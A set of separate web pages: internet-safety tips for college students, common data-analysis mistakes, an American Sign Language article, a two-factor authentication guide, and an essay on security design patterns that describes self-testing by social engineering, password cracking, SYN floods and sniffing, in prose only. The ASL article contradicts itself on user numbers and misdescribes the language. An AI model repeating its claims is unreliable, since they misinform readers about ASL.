There are many antivirus solutions available, both free and paid. Consider ease of use, price, features, and reviews when choosing an antivirus solution. Bitdefender, Norton, and McAfee are some of the leading names in antivirus software.
There's been a lot of news surrounding data breaches and privacy concerns lately. It's no wonder that so many people these days are using VPNs to protect their online activity. College students are especially vulnerable to these threats as they often use public Wi-Fi networks.
College students can encrypt their traffic and make it much harder for hackers to snoop on their activities by using a VPN. In addition, VPNs can also help bypass campus and geo-restrictions that may be in place.
There are many VPNs to choose from, both free and paid. Be sure to choose one that meets your needs. Some things you may want to consider when choosing a VPN provider are speed, security, price, and reviews. You can use a free VPN, like TunnelBear, or a paid VPN like ExpressVPN or CyberGhost.
College students can encrypt their traffic and protect their online activities by using a VPN.
To summarize, here are the most crucial Internet safety tips for college students:
Report incidents of cyberbullying and block the attacker.
Only use trusted websites when shopping online.
Secure your accounts with strong passwords and two-factor authentication.
Enable smartphone security features, such as biometrics and automatic updates.
Back up your data regularly using a cloud service or external drive.
Review your bank and credit card statements monthly to track your spending.
Secure your laptop and other devices, and don't leave them unattended.
Beware of unsecured Wi-Fi networks; use a VPN if you have to use public Wi-Fi.
Enable pop-up blockers to prevent malicious pop-ups from infecting your browser.
Use encryption tools like local data encryptors and VPNs for Internet data encryption.
Update your software regularly to minimize the number of vulnerabilities.
Watch out for phishing scams like job scams. Don't click on suspicious links and double-check a company before responding.
Learn how to combat the dangers of social media. Never give out your location, address, or other sensitive information.
Get antivirus software to protect your devices from malware, spyware, trojan viruses, adware, ransomware, and other online security threats.
Use a VPN to protect your privacy when using public Wi-Fi or campus networks.
Octav Fedor (Cybersecurity Editor)
Octav is a cybersecurity researcher and writer at AntivirusGuide. When he’s not publishing his honest opinions about security software online, he likes to learn about programming, watch astronomy documentaries, and participate in general knowledge competitions. | <urn:uuid:e59e7407-ee7c-4299-a4a7-ad27274c3519> | CC-MAIN-2022-40 | https://www.antivirusguide.com/cybersecurity/internet-safety-college-students/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00488.warc.gz | en | 0.929764 | 4,886 | 3.0625 | 3 |
When performing data analysis, it can be easy to slide into a few traps and end up making mistakes. Diligence is essential, and it’s wise to keep an eye out for the following 7 potential mistakes you can make. These include:
- Sampling bias
- Disclosing metrics
- Focusing only on the numbers
- Solution bias
- Communicating poorly
Let’s take a look at why each one can be problematic and how you might be able to avoid these issues.
Sampling bias occurs when a non-representative sample is used. For example, a political campaign might sample 1,300 voters only to find out that one political party’s members are dramatically overrepresented in the pool. Sampling bias should be avoided because it can weigh the analysis too far in one particular direction.
Cherry-picking happens when data is stacked to support a particular hypothesis. It’s one of the more intentional problems that appear on this list because there’s always a temptation to give the analysis a nudge in the “right” direction. Not only is cherry-picking unethical, but it may have more serious consequences in fields like public policy, engineering, and health.
Disclosing metrics is a problem because a metric becomes useless once subjects know its value. This ends up creating problems like the habit in the education field of teaching to what’s on standardized tests. A similar problem occurred in the early days of internet search when websites started flooding their content with keywords to game the way pages were ranked.
Overfitting tends to happen during the analysis process. Someone might have a model, for example, and the curve produced by the model seems to be predictive. Unfortunately, the curve is only a curve because the data fits the model. The failure of the model may only become apparent, however, when the model is compared to future observations that aren’t so well-fitted.
Focusing only on the numbers is worrisome because it can have adverse real-world consequences. For example, existing social biases can be fed into models. A company handling lending might produce a model that induces geographic bias by using data derived from biased sources. The numbers may look clean and neat, but the underlying biases can be socially and economically turbulent.
Solution bias can be thought of as the gentler cousin of cherry-picking. With solution bias, a solution might be so cool, interesting or elegant that it’s hard not to fall in love with. Unfortunately, the solution might be wrong, and appropriate levels of scientific and mathematical rigor might not be applied because refuting the solution would just seem disheartening.
Communicating poorly is more problematic than you might expect. Producing analysis is one thing, but conveying findings in an accessible manner to people who didn’t participate in the project is critical. Data scientists need to be comfortable with producing elegant and engaging dashboards, charts and other work products to ensure their findings are well-communicated.
How to Avoid These Problems
Process and diligence are your primary weapons in combating mistakes in data analysis. First, you must have a process in place that emphasizes the importance of getting things right. When you’re creating a data science experiment, there need to be checks in place that will force you to stop and consider things like:
- Where is the data coming from?
- Are there known biases in the data?
- Can you screen the data for problems?
- Who is checking everybody’s work?
- When will results be re-analyzed to verify integrity?
- Are there ethical, social, economic or moral implications that need to be examined more closely before starting?
Diligence is also essential. You should be looking at concerns about whether:
- You have a large and representative enough sample to work with
- There are more rigorous ways to conduct the analysis
- How you’ll make sure analysts are following properly outlined procedures
Tackling a data science project requires sufficient and ample planning. You also have to consider ways to refine your work and to keep improving your processes over time. It takes commitment, but a group with the right culture can do a better job of steering clear of avoidable mistakes. | <urn:uuid:13a397ad-7da1-416f-ab29-a438b35500c9> | CC-MAIN-2022-40 | https://www.inzata.com/the-7-most-common-data-analysis-mistakes-to-avoid/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00488.warc.gz | en | 0.937981 | 885 | 2.734375 | 3 |
American Sign Language (ASL) is the primary non-written language of Deaf people in the U.S. and many of Western Canada. ASL is an expressive and non-syntactic verbal language conveyed by facial movement and gestures with the hands and face. Data shows that over 33 million Americans use ASL to communicate with each other and a wide range of friends, family, and professionals. Many colleges and universities offer ASL courses and programs. They are provided primarily to individuals who wish to learn or improve their communication skills to serve their communities better and be of greater value in their personal, professional, and social lives.
There are many reasons that one would want to learn ASL. Some individuals have learned the language by observing spoken speech in Sign Language, while others have learned it from receiving hand signals from a caregiver or a book of signs. Many people take American Sign Language classes to become certified CNAs (Certified Nursing Assistant). Others sign up for audiotapes and videos of ASL expressions and gestures to memorize. Several people learn American Sign Language simply because they love the language and wish to improve their communication skills.
The National Association of Special Education Programs (NASEP) estimates that approximately 1.6 million Americans communicate in ASL. Of those individuals, about half are certified to administer American Sign Language at home or in a school/community setting. Sign language is becoming more popular throughout the United States as people learn the language or take ASL classes for personal or community benefit. There are many benefits to learning ASL:
One of the most obvious benefits of learning American Sign Language is that it is a hands-on skill that anyone can perform with any level of fluency. Compared to other common languages such as English and Spanish, learning American Sign Language has a higher retention rate because almost anyone can perform it. Individuals of all ages and from all walks of life can learn how to sign. Sign language users do not necessarily speak but rather make facial expressions, emotions, and body motions that look like words or sentences. Sign language users can communicate verbally with each other using only hand motions.
In addition to ASL visual elements, learners also benefit from speaking the language. Many studies show that reading books containing written speech improves reading comprehension skills, similarly, achieved by reading audiobooks. However, in today’s world, more individuals are reading text on the Internet. Because of this, many individuals are now able to perform “word by word” communication via the computer. Learning American Sign Language provides individuals the ability to read and understand spoken languages and allows them to communicate on a deeper level that only the spoken language can provide.
One of the main reasons people begin learning ASL is that they plan to take an American Sign Language exam, such as training from the American deaf exposure program. The information courses in ASL include a fundamental understanding of the language, posture statements, and vocabulary exercises. The position statement is essential in spoken languages, and it instructs individuals on how to position themselves physically to hold a conversation in an everyday setting. A posture statement is also helpful because it demonstrates how people who speak ASL stand in relation to one another, which is vital for an American Sign Language test. | <urn:uuid:06fc1264-dad6-4b21-a0f2-e7edcc55a9c6> | CC-MAIN-2022-40 | https://www.drware.com/category/knowledge-base/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00488.warc.gz | en | 0.950944 | 656 | 3.671875 | 4 |
Have you noticed that many login pages have a place to enter a code or token in addition to your password? You may have thought, “Why would I need that? I already have a password for logging in.” Let me explain why adding that layer of security is a good idea.
Imagine that to use an ATM, all you needed was either a PIN or an ATM card, not both. How easy would it be for someone to withdraw money from your account? If they guessed or learned your PIN, they’d have the ATM spitting dollar bills at them. If they stole or found your ATM card, that too would grant them access to your money. Not good, right?
Fortunately, an ATM requires both your PIN (something you know) and the ATM card (something you have). Because it’s much harder to get both of them at the same time, your bank account is safer.
Now think of an online account. If it’s only protected by a password (something you know), then all it takes for someone to get access is to guess or steal your password (or guess your security questions). Unfortunately, with the growing number of data breaches, that’s not too difficult. It’s like having an ATM that only requires a PIN.
But if that online account also requires you to get a code from your phone (something you have), that would be like an ATM that also requires an ATM card. And just as that ATM would be more secure, so too your online account would be more secure.
How to Increase Your Security Using Two-Factor Authentication
Let’s go back to the website that asks for a code when you log in. That code is like your ATM card. When you log into a website, you enter your password (something you know) and the code from your phone (something you have). This is called two-factor authentication. Your password is your first factor of authentication. The code from your phone is your second factor.
So, how can you use this to make your accounts more secure?
How to Set Up Two-Factor Authentication
After you log in, look in the settings for a way to enable two-factor authentication. You may also see it called security codes, two-step verification, 2FA, or multi-factor authentication (MFA). The code may also be called a token. Look in the Security and Privacy sections of your Settings, or under Account or Profile.
Once you find the option, click through the steps to enable it. Here’s how to enable two-factor authentication on Facebook:
Many websites still offer the option of sending codes by text message (SMS). That’s unfortunate, because text messages can be intercepted and spoofed. In other words, it’s not difficult for hackers to receive your text messages, even without your phone. You can learn more about this in the Further Reading section below. For these reasons, it’s more secure to use a hardware token (I like YubiKey) or an authentication app (such as Authy, which is what I use, or Google Authenticator).
Two-factor authentication (2FA) is only as strong as your weakest 2FA method. So if an account offers multiple methods (hardware key, authentication app, SMS/text, etc.), and you choose one other than SMS/text, then do not also enable SMS/text. If a hacker can’t get past one method, they’ll try another. That means it won’t matter if you have a stronger method such as an authentication app-enabled, because the hacker will go after the weaker SMS/text.
Besides the security problem, there are other problems with text message authentication. If you don’t have phone service, you won’t receive the texts. Even if you have service, sometimes text messages take minutes to arrive, rather than seconds. Authentication apps don’t have any of these problems.
Of course, if the only way a website will let you use two-factor authentication is through texts, then use that option! It’s better than not using two-factor authentication.
Be aware that some websites won’t send codes to “virtual phone numbers,” phone numbers that use VoIP (Internet phone service). I have a Google Voice number, and some websites won’t send SMS/text messages to it. I need to use my traditional mobile phone number instead.
Most websites will allow you to create backup codes. Those are useful in case your phone is lost or stolen. Be sure to create the backup codes, and store them somewhere secure. I store mine in LastPass, in the Notes field of the website they go to.
If a website doesn’t support two-factor authentication, contact them and ask them to add the option for the sake of the security of their users.
How to Use Two-Factor Authentication
So you’ve set up two-factor authentication for your account. Nice work! You can start using it the next time you log into your account. Here’s the general process:
- You visit a website and enter your username and password.
- If this is the first time you’re accessing your account from a particular device (computer, phone, tablet), you’re asked for a second factor to confirm that you are who you say.
- You get a code from your phone, either from an authentication app, or from an SMS/text message.
- You enter the code on the webpage.
- If your code is correct, you’re logged in!
Most websites will remember your device (using cookies) so you don’t need to enter a code each time you log in, only when you log in on a new device. And you’ll be asked if you want the system to remember your device. If you’re not using one of your own devices, say no!
I highly recommend that you use two-factor authentication for any accounts that contain sensitive data. I especially recommend it for any accounts that contain financial or medical data, or other personally identifiable information. That includes any site that allows you to pay, donate, send, or receive money. But also think of how much damage someone could do by accessing other accounts, such as your email or social media accounts. It’s better to be safe than sorry!
If a website allows you to use more than two factors, consider doing that, especially if it’s an account that contains sensitive data that you want to protect.
You may wonder, “What happens if I lose my phone? Will I be unable to log into my account?” The answer is yes, unless the account allows you to enter backup codes or log in some other way (such as through security questions). That’s why it’s so important to create backup codes (see above).
- Turn On 2FA includes tutorials showing how to enable two-factor authentication on many websites (turnon2fa.com)
- Two Factor Auth List lets you look up websites and see whether they support 2FA. If they do, the site tells you how to enable 2FA, as well as which forms they support (SMS/text, phone call, email, hardware token, software token). (twofactorauth.org)
- Authy’s 2FA Guides tell how to enable 2FA on several websites (authy.com)
- Why You Shouldn’t Use SMS for Two-Factor Authentication (and What to Use Instead) (howtogeek.com)
- Why you are at risk if you use SMS for two-step verification (cnet.com)
- Hanging Up on Mobile in the Name of Security (krebsonsecurity.com)
- Is two-factor authentication (2FA) as secure as it seems? (malwarebytes.com)
- How to: Enable Two-factor Authentication (eff.org)
What You Should Do
- Enable two-factor authentication for any account that contains sensitive data, or that you wouldn’t want to be hacked.
- Whenever possible, use a hardware token (such as YubiKey) or an authentication app (such as Authy or Google Authenticator) rather than receiving codes by text message or email.
- Create backup codes in case you’re ever without your phone when you need to log in. Save them securely, such as in your password manager or on paper in a safe.
Keeper is a top-rated password manager for protecting you, your family, and your business from password-related data breaches and cybersecurity threats.
1Password remembers all your passwords, so you can easily log in to sites with a single click.
Dashlane fills all your passwords, payments, and personal details wherever you need them, across the web, on any device. | <urn:uuid:00b01826-8cc1-42ce-86d7-5912fbe498dc> | CC-MAIN-2022-40 | https://defendingdigital.com/how-why-to-use-two-factor-authentication/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00688.warc.gz | en | 0.91866 | 1,871 | 3.171875 | 3 |
Security Design Patterns
Part 1 v1.4
Table of Contents
Copyright 2001, Sasha
A comprehensive security strategy first requires a high level recognition of overall Security Principles. They are simple statements, generally prepared by a Chief Information Officer (or Chief Security Officer) that addresses general security concerns. E.g. monitor all activity, audit your practices, promote security awareness, etc.
Next, Security Policies are created. These are the realization of Security Principles. Prepared by security professionals, Security Policies are meant to address security issues when implementing business requirements. E.g. use out of band communication when responding to an incident alert, employ secure coding techniques, implement a central log server, etc.
Finally, Security Procedures are identified. This is an itemized, quantifiable list that identifies specific hardware, tools and tasks. E.g. disable telnet and ftp on all hosts – replace with ssh and scp, validate html form data on both client and server, change default application passwords, etc.
This essay is not meant to replace any of these documents, but to supplement all three. That is, once general policies are defined, security patterns can assist in identifying and formulating all security practices that are relevant to your environment.
These patterns are essentially security best practices presented in a template format. This format, we feel, will assist the reader in identifying and understanding existing patterns, and enable the rapid development and documentation of new best practices.
Design patterns were first introduced as a way of identifying and presenting solutions to reoccurring problems in object oriented programming. Joseph Yoder and Jeffrey Barcalow were one of the first to adapt this approach to information security. Here, we attempt to build upon this list by introducing eight patterns. The format was adopted from the object oriented design pattern template developed by the Group of Four , , Appendix A. Of course, no experience with OO programming is required to enjoy these patterns.
The Yoder and Barcalow paper presented the following patterns:
· Single Access Point: Providing a security module and a way to log into the system.
· Check Point: Organizing security checks and their repercussions.
· Roles: Organizing users with similar security privileges.
· Session: Localizing global information in a multi-user environment.
· Full View with Errors: Provide a full view to users, showing exceptions when needed.
· Limited View: Allowing users to only see what they have access to.
· Secure Access Layer: Integrating application security with low-level security.
These are a good start, but when we consider the issues that arise when securing a networked application there are others that will apply.
In this essay we present the following security patterns:
· Authoritative Source of Data: Recognizing the correct source of data.
· Layered Security: Configuring multiple security checkpoints.
· Risk Assessment and Management: Understanding the relative value of information and protecting it accordingly.
· 3rd Party Communication: Understanding the risks of third party relationships.
· The Security Provider: Leveraging the power of a common security service across multiple applications.
· White Hats, Hack Thyself: Testing your own security by trying to defeat it.
· Fail Securely: Designing systems to fail in a secure manner.
· Low Hanging Fruit: Taking care of the “quick wins”.
The patterns described in this essay (along with the ones already published) represent a collection of security best practices. Naturally, depending on one’s environment and goal, some may apply and others may not.
The intent is for the reader to review all patterns and identify those that are relevant to their environment; the implementation of which may define or refine an existing security policy.
Note that the scope of these patterns should not be restricted to software applications alone. For example, Check Point, Single Access Point and Layered Security all apply to network security just as well.
Let’s assume you have an existing ebusiness site. You have gone through initial due diligence to secure the application, servers, and network. What else can be done and where do you start?
Let’s review the patterns you may already have used:
Session: You know basically who your users are and what they’re accessing. You may have targeted web content and individual login accounts for specialized information.
Layered Security: Your ISP has (assured you they’ve) protected your network with ACLs on their (shared) switch or firewall. Your servers are patched as of two months ago and run minimal services. Your 3rd party applications don’t use their default passwords and don’t run as root.
Risk Assessment and Management: Your clickstream and web logs aren’t encrypted, but customer credit card information exists encrypted in the database. Sensitive corporate information sits on a file server on a separate subnet, behind a firewall.
3rd Party Communication: On a scheduled basis, you exchange information with a business partner. The files are sent cleartext over ftp.
Not bad, but what else can be done? Let’s go through the patterns…
Authoritative Source of Data:
· Are the applications processing the proper data? That is, are they using values from a trusted database or do they originate from a potentially fraudulent source?
· Is the trusted source still valid? Has there been a migration of data or data ownership?
· How does the firewall restrict access to the corporate firewall? Have these ACLs been revisited lately?
· How are vpn, home DSL users secured?
· Has there been a network or application breach of security? Would you really know if there was? How?
Risk Assessment and Management:
· Can you locate all of the sensitive corporate documents? Can you locate those responsible for them – the data owners? Are the documents stored and transferred securely?
· Have you recently performed a vulnerability and risk assessment of your network and applications? Have you addressed the results?
3rd Party Communication:
· Other than cleartext ftp, how is access controlled? Are the passwords ever changed? Is the data sanitized before being processed?
· Are you are actively monitoring your network and have learned to detect anomalous behavior like burst traffic, forged packets or unused protocols?
· Are your business partners adequately segregated from one another? Are you sufficiently protected from them? Could one business partner potentially use your network to attack another partner? How do you know?
The Security Provider:
· Do you provide access via web, ftp or other applications to business partners? If so, is the access control managed centrally? Does the current method scale? Does it need to?
· Do your business applications provide adequate authentication and authorization? Would you benefit from having these services abstracted out to a single system? Could it then be leveraged by other applications and managed centrally?
· Is there a sufficient level of delegated admin?
White Hats, Hack Thyself:
· Are you aware of all known vulnerabilities in you environment?
· How seriously does management take security? Would this change if you sent them their password, or those of your customers?
· How does management view the risk of attack (in financial terms)? Have they tried to quantify the risk?
· Are you prepared (or even able) to take the appropriate legal action in the event of an incident?
Given that there are many more patterns to be discussed, this essay presents only a limited number. The following are additional patterns to be discussed in a follow-up paper.
· Distributed Trust: Distributing trust amongst multiple entities.
· Least Privileges: Granting the minimum access necessary to perform any given task, for a minimum amount of time.
· Role Based Access Control (RBAC): Abstraction of users from the resources they’re attempting to access.
· Data Privacy, Integrity, Authentication: Protecting data from eavesdroppers, theft and manipulation.
· Data Sanitization: Removal of expired, duplicate and unnecessary data, finding owners, normalizing at times, legalization almost always (i.e. no shared versions of licensed code).
· Feel the Network: Learning to recognize load and activity patterns in your environment. Establishing a datum for the purpose of identifying anomalies.
System of Record
Patient heath records are nowadays becoming accessible over public networks. Granted, every packet may be strongly encrypted, with guaranteed privacy, authentication and integrity. While the networked applications may be built securely and provide high availability, this is of little comfort, however, if this highly protected information is outdated or incorrect. Understanding the authoritative source of data means recognizing where your data is coming from and knowing to what extent you can trust the validity of such information.
If an application or user blindly accepts data from any source then it is at risk of processing potentially outdated or fraudulent data. Therefore, an application needs to recognize which, of possibly many sources, is the single authority for data.
Are you assured the data you’re using is the cleanest and most accurate? In other words, is the data coming from a legitimate source or from an unknown party?
· Enterprises with multiple business units fail to recognize which, of many possible data stores, is the proper authority for information. E.g. a local database, corporate HR, managed outsourced provider, etc.
· Web applications store confidential information inside http cookies without properly protecting the contents from theft, modification or impersonation.
· A news wire receives a report of the resignation of several board members of a company. Several employees are also allegedly involved in an internal computer attack. The news wire mistakenly publishes the counterfeit report, causing the company’s value to plummet.
· Web applications process (hidden) form values without verifying their integrity.
Never make assumptions about the validity of unverified data or its origin.
Business applications are designed to accept, process and (optionally) return information. They may accept data from end users, static repositories or other applications; in real- time, delayed, or by batch processing. Regardless of the origin, type, or purpose, there should be meaningful validation at each step.
In most cases, determining the authoritative source of data will lie with the owner of the business process. They, rather than information security or IT groups, will understand the purpose of data in a larger context. Information security and IT, however, should still advise the business owner on the volatility and integrity of the data source(s) under consideration.
· Some application servers recognize when an html form value has been changed. They hash the names and values of hidden form fields before they are served to the client and compare the hash when the form is posted back.
· Etailer applications retrieve pricing, discounts from the application’s database and never rely on hidden values passed along in form submissions.
· Enterprise applications need to agree on a primary source for employee information and ensure duplicate or expired data has been purged.
aIntegrity of data is maintained
aThe risk of processing and propagating fraudulent (poisoned) data is reduced.
r Increased time to implement new processes as multiple data sources may be consolidated into one.
Defense in Depth
Belt and Suspenders
Networked applications are susceptible to many forms of attack that may target the network, host or application layer and the communication between them. Naturally, the overall security of a system is greatly improved when each one of these layers are identified, protected, and audited for possible weakness.
Moreover, attacks may originate internally or externally. Basing security rules on the premise of “internal users are good” and “external users are bad” is fundamentally flawed (read insider threat) and difficult to manage. With increased use of external business communication channels, it therefore becomes much more difficult to identify which users or sessions are “internal” and which are “external”.
Networked applications and the environment within which they operate are vulnerable at many layers and from all directions. Each device, data object, session, file and process is a potential target and needs to be identified and secured.
· Once standalone applications are suddenly now networked and unprepared to withstand network attacks.
· Protection of any one of network, server or application is not sufficient to adequately protect the data within an enterprise.
· While one or many components of a system may be protected, it truly is only as secure as the weakest link.
· If a single devices or application fails or is misconfigured it could potentially expose all private resources.
Employ security measures at all layers of a networked application and throughout its operating environment.
Router ACLs, address translation and intrusion detection systems protect the network layer. OS hardening, thoughtful application installation and configuration protect the host and the applications that run on it. Practicing secure coding techniques protect all of the above. Finally, proper baselining and monitoring methodologies protect all these layers on an ongoing basis.
Don’t ignore insider threat. Intrusions and attacks can originate from the inside just as they can from the outside. Authentication, authorization, antivirus software, and intrusion detection systems should protect resources from both sides of the corporate boundary.
· Firewalls provide ingress/egress packet and protocol filtering.
· Application servers and 3rd party services authenticate users over SSL.
· Applications validate form data by length, bounds and type.
· All network and application activity is monitored and logged for analysis.
aGreatly improved overall security
aReduced exposure to attack if one security measure should be subverted or misconfigured
aContinuously validates security efforts
r More complex security architecture
Risk Assessment and Management
Not all information requires the same degree of protection. Patient records, web log files, military tactics, and hourly weather reports all have varying degrees of sensitivity. The proper security of all of this information requires risk analysis. Naturally, if the risk is high, the effort to protect the data should be great. If the risk is low, the protection should be low.
Similarly, hardware and software throughout the enterprise will require varying degrees of hardening. The security requirements of a front-end application server are different than those of an internal development machine. A front-line firewall is secured differently than a QA router.
It is worth noting that this could be considered a catch-all pattern. Since security is all about risk management, every resource (file, servlet, object, datastore, application, server, etc.) warrants risk assessment.
Whenever information needs to be transferred, stored or manipulated, the privacy and integrity of that data needs to be reasonably assured. Hardware and software require protection from misconfiguration, neglect and attack. Underprotection of any of these could drive a company to bankruptcy (or legal battle) and overprotection is a waste of resources.
· Time and money improperly allocated to protecting resources.
· Risk incorrectly assessed, or not assessed at all.
Identifying and assessing risk is the first step to better security. Risk is proportional to the following three variables: threat, vulnerability and cost(value). That is,
Risk = Threat * Vulnerability * Cost Eq. 1, where;
Threat is the frequency of attempts or successes,
Vulnerability is the likelihood of success, and
Cost is the total cost of a successful breach by this mechanism. Cost also accounts for the value of the resource or information being protected.
Eq. 1 also implies that if any one of these variables is zero, the risk will also be zero. Identifying a practical example of this is left as an exercise to the reader.
Learn to recognize what is valuable and to whom. Different attackers will have different motives and will therefore target different resources. Youth hackers, generally, are motivated by publicity or mischief and seek to deface web pages or spread malware. Professional criminals are motivated by financial reward and may seek to steal credit card numbers or specialized information (secret recipes, blueprints, etc.). Terrorists care little for web page defacement but more for infrastructure denial of service and mass destruction.
· Production web and application servers are severely hardened, kept up to date with patches and actively monitored.
· QA and development machines have a reduced (from default) set of services running but may be behind on patch updates.
· Customer credit cards are strongly protected and stored encrypted (or not stored at all).
· Hourly weather feeds are not stored or transferred securely.
· Press releases, while hopefully authenticated, need not be encrypted.
aOnly the appropriate amount of effort is spent to protect data
aA better understanding is gained of the profiles of attackers and the value of data they seek.
a Recognition of ownership and accountability of data within the organization
Virtual Enterprise Network
Enterprises often partner with third parties to support their business model. These may include application and managed service providers, business partners, vendors, and even satellite offices. As part of this relationship, access must be granted to allow potentially sensitive data to travel between the organizations. Without attention to the security of that data and the methods of transfer, one or both organizations may be at risk. Not only is there risk of data theft and manipulation, but also the risk of allowing other organizations to access your resources.
You may trust the partner with whom you entered into a relationship, but you may not trust their contractors, application vendors, networks or firewall configuration. A breach in their network may lead to a breach in yours. E.g. May 30th, 2001, an OSDN break-in that allowed an attacker to jump from Sourceforge to a server of the Apache Software Foundation.
Two companies in a business relationship may trust each other, but to what degree? Specifically, when two businesses exchange information, users and/or applications will require access to privileged resources. How can access be granted while at the same time protecting both organizations? Additionally, how can this be managed in such a way that is neither overly complex nor dangerously simplistic?
· Companies need to be assured that private information is adequately protected when traveling over a public or private network.
· Applications that communicate with business partners become vulnerable not only to attack from that partner but also from attacks from users who defeat the partners’ security.
· Accountability is difficult to assure without a proper security policy signed by all parties involved.
· Security procedures become difficult to manage when both business partners do not share the same security requirements and considerations.
Begin by identifying appropriate channels of communication and information exchange. This includes all protocols and any hardware devices that will be used. E. g. an ipsec vpn, https, ssh, or ftp. Next, define the authorized access points. For IP connectivity, this implies defining where connections will be originating and where they are destined. This helps restrict access based on source and destination host. Next, identify all users that require privileged access. Assign usernames and passwords via out-of-band communication.
Additional security will be achieved if all 3rd party traffic can be separated from one another. Switched networks, separate subnets and individual hosts are examples of reasonable practices.
Provide technical and emergency points of contacts and define any fall back procedures. This information becomes critical in the event of system failure and steadfast business deadlines.
Once the risks have been identified and security measures defined, both parties should signoff on these policies. They must commit but be flexible to modify them should the risk or business requirements change.
Both parties should be willing to provide audit and compliancy reports proving adherence to the policy. Under some circumstance, a personnel security audit may be required.
Finally, once a business relationship has terminated, swiftly revoke all access by the partner to your network and applications.
· Web based extranet access will be available only over SSL. Username and password will be provided via OOB communication or encrypted email.
· Adequate password hygiene will be maintained.
· Users will not share accounts nor escalate their privileges by using another person’s account. SUDO will be provided where necessary.
· File transfer will take place on a scheduled basis via ftp. Chroot environments will be configured and files will be pgp encrypted and stored in a write only directory.
· Activity logs will be distributed on an appropriately scheduled basis. Each party is requested to confirm all activity.
r Additional security configurations and policies to manage
aProperly managed expectations with respect to security precautions and procedures
aAuditable activity for both parties
a Secured third party communications enables new business partnerships and alliances
Risk Assessment and Management
Single Sign On
An enterprise application may be comprised of a number of software and hardware components with each potentially performing its own authentication, authorization, or encryption. While some of these components may implement open or standards-based APIs, others may use closed or unknown technology or simply lack functionality altogether. By abstracting security services from individual applications, an organization is able to centralize the management and functionality of the protocols and policies governing authentication and authorization services.
When disparate applications seek to provide their own security services, privacy, synchronization and management of data becomes unnecessarily complex. Moreover, applications may not provide the security features or strength required, risking the overall integrity of the data. These applications may be communicating securely or they may be using weak or inappropriately vulnerable methods. Without a common security infrastructure, the management becomes unnecessarily difficult and risks the security of the entire environment.
· Desire to use a single service to provide management and auditing for a common set of security services for all enterprise applications.
· Desire to use stronger, or more flexible security features in applications.
· Desire to provide integrity and consistency of data for authentication and authorization.
A Security Provider is a central service to which are directed all authentication and authorization requests. Applications such as email, web, corporate applications and others, would communicate directly with the Security Provider. The Security Provider then communicates with a user or policy store to evaluate a user’s credentials and privileges.
A Security Provider has the following properties:
· Authoritative source for user verification (authentication)
· Authoritative source for role assignment and policy enforcement (authorization)
· Provides centralized (and possibly delegated) management of security policies
· Provides consolidated reporting and auditing facilities
· Implements secured connections to possibly separate user and policy data stores
· Defines appropriate type and strength of technology for information protection (encryption) between itself and requesting applications
· May provide single sign on (SSO) facilities across applications
· May provide single sign on facilities across organizations or satellite offices
· BEA’s WebLogic Server can abstract authentication requests to an external user store, affording integration with a Security Provider.
· Entrust and other vendors provide single sign on applications that centralizes user credentials and authorization policies.
· Netegrity’s Siteminder can effectively create a single sign on across multiple disparate applications by brokering trust back to the user’s “home” authentication service.
aEfficient user and data management due to centralized user store
aCommon set of technologies and standards used for all security services
aTransparent session for end users across applications and potentially across participating organizations
r Applications need to be configured (or reconfigured) to utilize this common authentication service.
Authoritative Source of Data
Policies and information security documentation will ultimately fail unless they are understood, practiced, and revised. Once an organization has developed reasonable security measures, the implementation must be verified. Testing security by applying gray hat techniques against your own systems can be quite revealing. The goal is not to crash systems, but to test the behavior and response of your network, application and staff.
How can you be assured of the true security of your systems without real-world testing?
· After-the-fact discovery of misconfigured security tools or measures.
· Response personnel ill prepared for incident handling.
· Uncertainty of how devices will respond to targeted attacks.
Under a controlled, but non-trivial circumstance, plan and execute an attack. You have the option of targeting various parts of your environment:
· Social Engineering (aka Semantic Attack): Attempt to acquire passwords or privileged information from employees by impersonating a manager, office administrator, or operations staff.
· Server: Test backups by randomly deleting (or “misplacing”) a file or directory. Use Crack, John the Ripper or L0ftCrack to determine weak user or application passwords.
· Network, Personnel: Perform a TCP SYN flood against a web, mail, or ldap server. Note this does not need to be an externally facing server. An “internally” facing attack may, indeed, be more educational.
· Application Code: Attempt some of the popular application exploits; buffer overflow, misconfigurations, cookie poisoning, parameter tampering, replay attack. Check for meaningful log messages and abnormal application behavior.
· Passive attacks: Sniffing the wire for cleartext passwords or other confidential information. Perform a TCP and UDP port scan.
· Active attack: Penetration or reconnaissance attack from the outside in.
· Save the viruses, trojans, worms and other malware for isolated testing environments. Be certain to cleanly wipe the infected machines afterwards.
Perform the attacks on an ongoing basis and be sure to record the results. This will be valuable when determining the effectiveness of the tests and the organization’s overall security.
To protect the integrity of the tests, ensure they are performed with limited staff knowledge; you don’t want to spoil the surprise. It is also wise to wait for an appropriate time when there is available staff and there are no corporate emergencies.
Be very careful with these tests; you do not want to permanently damage any system, application or reputation. And of course, this should only be performed against your own environment and not against your customer or business partner.
· Sanctum’s AppScan has the ability to automate and document controlled web-based intrusion attempts.
· nCircle actively monitors networks and hosts for new activity and vulnerabilities and responds accordingly.
aOpportunity to bring controlled security testing into the QA cycle.
aRepeatedly testing security measures provides a measurable audit trail of improvement.
aUsing attacker tools educates security professionals on methods of attack and defense.
aSocial engineering attacks raise security awareness for all employees.
aHelps quantify cost of attempted and successful intrusions to upper management.
r Risk of actual damage.
Risk Assessment and Management
Networks, hosts and applications should default to secure operation. That is, in the event of failure or misconfiguration they should not reveal more information than necessary with regard to
· error messages (for efficient debugging purposes)
· the application configuration (directory, version/patch levels)
· the operating environment (network addressing, OS version/patch levels)
As well, they should not allow transactions or processes to continue
· with more privileges than normal
· with more access than normal
· without proper validation of input parameters and output results
· bypassing any monitoring or logging facilities
In the event of a failure or misconfiguration of an application or network device, would the result be a more, or less secure environment? That is, would the consequence result in a user performing a given operation unprotected; or a device passing unauthorized information?
· Failure of a system without proper error handling may result in a user gaining additional privileges or access.
· During a failure, improper (or complete lack of) fail-safe measures may result in a denial of service condition.
· The silent failure of a security measure (application monitoring tool, IDS, etc.) would prevent administrators from recognizing malicious or anomalous activity.
